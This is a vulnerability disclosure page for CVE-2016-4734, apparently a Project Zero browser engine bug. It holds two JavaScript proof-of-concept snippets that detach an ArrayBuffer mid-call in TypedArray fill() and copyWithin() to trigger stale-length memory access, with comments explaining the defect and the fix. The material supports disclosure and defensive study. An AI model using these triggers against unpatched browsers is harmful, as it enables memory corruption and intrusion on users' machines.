CVE-2016-4734.md

File metadata and controls

45 lines (35 loc) · 904 Bytes

CVE-2016-4734

  • Report: June 2016
  • Fix: July 2016
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

// PoC snippet 1: TypedArray.prototype.fill() with a `start` argument whose
// valueOf() transfers -- and therefore detaches -- the view's backing buffer.
//
// `f` is installed as `o.valueOf` below, so the engine invokes it while
// coercing the `start` argument of a.fill(). Listing `q` in the postMessage
// transfer list detaches it (standard structured-clone-with-transfer
// semantics); presumably this happens whether or not the message is ever
// delivered to "http://127.0.0.1" -- verify against the engine under test.
// The try/catch swallows any exception from the call (e.g. a DataCloneError
// if `q` is already detached on a second invocation). The return value is
// what fill() uses as the coerced start index.
function f(){
  try{
    postMessage("test", "http://127.0.0.1", [q])
  } catch(e){ }
  return 0x12345678;
}

// 0x7fffffff bytes (~2 GiB). Engines that cap ArrayBuffer size will throw a
// RangeError here, which nothing catches.
var q = new ArrayBuffer(0x7fffffff);
var o = {valueOf : f}
var a = new Uint8Array(q);

// Trigger: value 0x12, start = o (coerced through f, which detaches q),
// end = 0x77777777. The defect being exercised appears to be that fill()
// keeps using a length / backing store captured before argument coercion;
// the defensive invariant is that a TypedArray builtin must re-check for
// detachment and re-read the length after every user-observable coercion
// step, before touching memory. The try/catch keeps the script running past
// any exception.
try{
  a.fill(0x12, o, 0x77777777);
} catch(e){ }
// PoC snippet 2: same pattern against TypedArray.prototype.copyWithin().
//
// NOTE(review): `f` and `q` are declared a second time here. In the original
// markdown these are presumably two separate fenced code blocks; if the whole
// page were run as one script, function-declaration hoisting would make this
// `f` (returning 0x22345678) the one used by snippet 1 as well.
//
// As above, `f` is the valueOf hook: it detaches `q` by transferring it and
// returns the value that becomes the coerced `start` index. Errors from
// postMessage are swallowed.
function f(){
  try{
    postMessage("test", "http://127.0.0.1", [q])
  } catch(e){ }
  return 0x22345678;
}

// ~2 GiB buffer; may throw a RangeError on engines with a smaller cap.
var q = new ArrayBuffer(0x7fffffff);
var o = {valueOf : f}
var a = new Uint8Array(q);

// Trigger: target = 0x12345678, start = o (coerced through f, detaching q),
// end = 0x32345678. Unlike snippet 1 this call is not wrapped in try/catch,
// so any exception raised by a correctly hardened engine (e.g. a TypeError
// on a detached buffer) terminates the script. The expected safe behaviour is
// that copyWithin() re-validates the view after coercing its arguments rather
// than copying against a stale length.
a.copyWithin(0x12345678, o, 0x32345678);

Reference